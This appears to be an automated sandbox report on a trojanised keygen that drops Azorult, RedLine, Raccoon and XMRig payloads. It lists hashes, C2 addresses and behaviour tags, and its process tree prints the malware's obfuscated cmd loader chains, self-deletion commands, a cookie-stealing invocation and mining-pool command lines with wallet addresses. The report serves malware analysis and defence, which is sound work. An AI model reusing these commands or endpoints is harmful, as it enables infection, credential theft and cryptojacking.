Analysis

  • max time kernel
    1799s
  • max time network
    1773s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    20-05-2021 20:35

General

  • Target

    Ccgetmac.Version.3.9.serial.keygen.exe

  • Size

    9.0MB

  • MD5

    6fc07da0a519310b03b1f5d848ca327d

  • SHA1

    af5271b735669ec632ecf18eca841c5b3fb1c4d0

  • SHA256

    47f381ac61e4b5279863c5fbf577a443554044d0ddb5e0c9f22bca25c9c413b3

  • SHA512

    f4c846db325768bc90a91e78d63cf1d8cdd12fc2e83853a20d54569927dd4addab75a0d8786400c12e831989408d42d015ac04d0e1fe47aad49f62ce199dbd17

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

redline

Botnet

ServLyla2

C2

87.251.71.4:80

Extracted

Family

raccoon

Botnet

e0aa5b6d2491c503baf06d4cfeb218de1cd41474

Attributes
  • url4cnc

    https://tttttt.me/hbackwoods1

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 19 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:996
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1352
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2856
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2804
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            PID:2796
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2540
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2504
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1964
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1376
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1180
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1172
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:344
                      • C:\Users\Admin\AppData\Local\Temp\Ccgetmac.Version.3.9.serial.keygen.exe
                        "C:\Users\Admin\AppData\Local\Temp\Ccgetmac.Version.3.9.serial.keygen.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:772
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3340
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                            keygen-pr.exe -p83fsase3Ge
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:1936
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:860
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                5⤵
                                  PID:4120
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                              keygen-step-1.exe
                              3⤵
                              • Executes dropped EXE
                              PID:3960
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                              keygen-step-5.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2768
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c COPY /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ..\QWjHI.exe > nul && STart ..\QWjHI.exe -p27ynDU0RROn_1Esjj_BT3 & If "" =="" for %L IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F /iM "%~NXL" > NuL
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1052
                                • C:\Users\Admin\AppData\Local\Temp\QWjHI.exe
                                  ..\QWjHI.exe -p27ynDU0RROn_1Esjj_BT3
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:3892
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c COPY /y "C:\Users\Admin\AppData\Local\Temp\QWjHI.exe" ..\QWjHI.exe > nul && STart ..\QWjHI.exe -p27ynDU0RROn_1Esjj_BT3 & If "-p27ynDU0RROn_1Esjj_BT3 " =="" for %L IN ( "C:\Users\Admin\AppData\Local\Temp\QWjHI.exe" ) do taskkill /F /iM "%~NXL" > NuL
                                    6⤵
                                      PID:4176
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /C EcHO | SeT /p = "MZ" > VLtI.N & cOPY /B /y VLti.N + 6wVNLNJ.QO + 6Q1e.WHX + b~jVM.BED ..\NeNFc.Nt > Nul &stArT regsvr32 ..\NenfC.Nt /S & DeL /Q * > nuL
                                      6⤵
                                        PID:4328
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                          7⤵
                                            PID:4672
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>VLtI.N"
                                            7⤵
                                              PID:4728
                                            • C:\Windows\SysWOW64\regsvr32.exe
                                              regsvr32 ..\NenfC.Nt /S
                                              7⤵
                                              • Loads dropped DLL
                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                              PID:4892
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /F /iM "keygen-step-5.exe"
                                          5⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4160
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe
                                      keygen-step-6.exe
                                      3⤵
                                      • Executes dropped EXE
                                      • Modifies system certificate store
                                      • Suspicious use of WriteProcessMemory
                                      PID:1640
                                      • C:\Users\Admin\AppData\Roaming\7555.tmp.exe
                                        "C:\Users\Admin\AppData\Roaming\7555.tmp.exe"
                                        4⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:4396
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\7555.tmp.exe"
                                          5⤵
                                            PID:4576
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /T 10 /NOBREAK
                                              6⤵
                                              • Delays execution with timeout.exe
                                              PID:4200
                                        • C:\Users\Admin\AppData\Roaming\8F37.tmp.exe
                                          "C:\Users\Admin\AppData\Roaming\8F37.tmp.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Suspicious use of SetThreadContext
                                          PID:2536
                                          • C:\Windows\system32\msiexec.exe
                                            -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w376@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                            5⤵
                                              PID:4776
                                            • C:\Windows\system32\msiexec.exe
                                              -o pool.minexmr.com:4444 -u 87rRyMkZM4pNgAZPi5NX3DdxksaoNgd7bZUBVe3A9uemAhxc8EQJ6dAPZg2mYTwoezgJWNfTpFFmnVYWXqcNDMhLF7ihFgM.w23885 --cpu-max-threads-hint 50 -r 9999
                                              5⤵
                                              • Blocklisted process makes network request
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4328
                                          • C:\Users\Admin\AppData\Roaming\9022.tmp.exe
                                            "C:\Users\Admin\AppData\Roaming\9022.tmp.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Drops startup file
                                            PID:4316
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe" >> NUL
                                            4⤵
                                              PID:4608
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1
                                                5⤵
                                                • Runs ping.exe
                                                PID:4672
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                            keygen-step-3.exe
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:1612
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                              4⤵
                                                PID:3988
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 1.1.1.1 -n 1 -w 3000
                                                  5⤵
                                                  • Runs ping.exe
                                                  PID:4236
                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                              keygen-step-4.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of WriteProcessMemory
                                              PID:2832
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe
                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                • Modifies registry class
                                                • Suspicious use of WriteProcessMemory
                                                PID:1276
                                                • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                  "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",setuser
                                                  5⤵
                                                  • Loads dropped DLL
                                                  • Modifies registry class
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4340
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\ABCbrow.exe
                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\ABCbrow.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4416
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                  5⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3976
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                • Suspicious use of WriteProcessMemory
                                                PID:3988
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe
                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:4588
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:992
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4184
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:5072
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3892
                                        • \??\c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                          1⤵
                                          • Suspicious use of SetThreadContext
                                          • Modifies registry class
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:3524
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                            2⤵
                                            • Drops file in System32 directory
                                            • Checks processor information in registry
                                            • Modifies data under HKEY_USERS
                                            • Modifies registry class
                                            PID:4532

                                        Network

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • memory/344-319-0x0000022348170000-0x00000223481E0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/344-215-0x0000022347B50000-0x0000022347BC0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/860-152-0x0000000002940000-0x0000000002ADC000-memory.dmp

                                          Filesize

                                          1.6MB

                                        • memory/996-186-0x0000028903C30000-0x0000028903CA0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/996-311-0x0000028903CA0000-0x0000028903D10000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/1172-317-0x0000020298E70000-0x0000020298EE0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/1172-209-0x0000020298280000-0x00000202982F0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/1180-240-0x0000028C5D6B0000-0x0000028C5D720000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/1180-325-0x0000028C5D720000-0x0000028C5D790000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/1352-229-0x000001F2F2790000-0x000001F2F2800000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/1352-321-0x000001F2F2DA0000-0x000001F2F2E10000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/1376-245-0x00000186BEA00000-0x00000186BEA70000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/1376-327-0x00000186BEDB0000-0x00000186BEE20000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/1640-129-0x00000000005E0000-0x00000000005F7000-memory.dmp

                                          Filesize

                                          92KB

                                        • memory/1964-233-0x0000011193180000-0x00000111931F0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/1964-323-0x0000011193640000-0x00000111936B0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/2504-188-0x000002978DE90000-0x000002978DEDB000-memory.dmp

                                          Filesize

                                          300KB

                                        • memory/2504-313-0x000002978EB20000-0x000002978EB90000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/2504-193-0x000002978EA40000-0x000002978EAB0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/2540-315-0x0000019892840000-0x00000198928B0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/2540-198-0x0000019891D20000-0x0000019891D90000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/2796-329-0x000001FE32C80000-0x000001FE32CF0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/2796-232-0x000001FE32860000-0x000001FE328D0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/2804-238-0x000002603B7A0000-0x000002603B810000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/2856-201-0x00000272AB160000-0x00000272AB1D0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/2856-309-0x00000272AB740000-0x00000272AB7B0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/3524-192-0x0000029869660000-0x00000298696D0000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/3976-286-0x00000000073C0000-0x00000000073C1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/3976-280-0x0000000006220000-0x0000000006221000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/3976-256-0x0000000005310000-0x0000000005916000-memory.dmp

                                          Filesize

                                          6.0MB

                                        • memory/3976-257-0x00000000056A0000-0x00000000056A1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/3976-287-0x0000000006E90000-0x0000000006E91000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/3976-241-0x0000000000400000-0x000000000041C000-memory.dmp

                                          Filesize

                                          112KB

                                        • memory/3976-250-0x0000000005920000-0x0000000005921000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/3976-285-0x0000000006CC0000-0x0000000006CC1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/3976-253-0x00000000053F0000-0x00000000053F1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/3976-252-0x0000000005390000-0x0000000005391000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/3976-255-0x0000000005430000-0x0000000005431000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/3976-281-0x00000000067C0000-0x00000000067C1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/3988-254-0x0000000000400000-0x00000000005DB000-memory.dmp

                                          Filesize

                                          1.9MB

                                        • memory/4316-264-0x0000000000D70000-0x0000000000D75000-memory.dmp

                                          Filesize

                                          20KB

                                        • memory/4328-282-0x0000000140000000-0x000000014070D000-memory.dmp

                                          Filesize

                                          7.1MB

                                        • memory/4328-307-0x000002144B850000-0x000002144B870000-memory.dmp

                                          Filesize

                                          128KB

                                        • memory/4328-288-0x000002144B830000-0x000002144B850000-memory.dmp

                                          Filesize

                                          128KB

                                        • memory/4328-275-0x0000000140000000-0x000000014070D000-memory.dmp

                                          Filesize

                                          7.1MB

                                        • memory/4328-279-0x000002144B610000-0x000002144B630000-memory.dmp

                                          Filesize

                                          128KB

                                        • memory/4340-182-0x00000000049E6000-0x0000000004AE7000-memory.dmp

                                          Filesize

                                          1.0MB

                                        • memory/4340-184-0x0000000004B50000-0x0000000004BAC000-memory.dmp

                                          Filesize

                                          368KB

                                        • memory/4396-273-0x0000000000400000-0x000000000049C000-memory.dmp

                                          Filesize

                                          624KB

                                        • memory/4396-272-0x00000000020D0000-0x0000000002161000-memory.dmp

                                          Filesize

                                          580KB

                                        • memory/4416-174-0x0000000000440000-0x0000000000441000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/4416-207-0x0000000004E00000-0x0000000004E01000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/4416-183-0x0000000002760000-0x0000000002769000-memory.dmp

                                          Filesize

                                          36KB

                                        • memory/4532-217-0x0000013A50E00000-0x0000013A50E70000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/4532-278-0x0000013A53500000-0x0000013A53606000-memory.dmp

                                          Filesize

                                          1.0MB

                                        • memory/4776-277-0x0000000140000000-0x0000000140383000-memory.dmp

                                          Filesize

                                          3.5MB

                                        • memory/4776-270-0x0000000140000000-0x0000000140383000-memory.dmp

                                          Filesize

                                          3.5MB

                                        • memory/4892-237-0x0000000002980000-0x0000000002A84000-memory.dmp

                                          Filesize

                                          1.0MB

                                        • memory/4892-267-0x0000000010000000-0x0000000010182000-memory.dmp

                                          Filesize

                                          1.5MB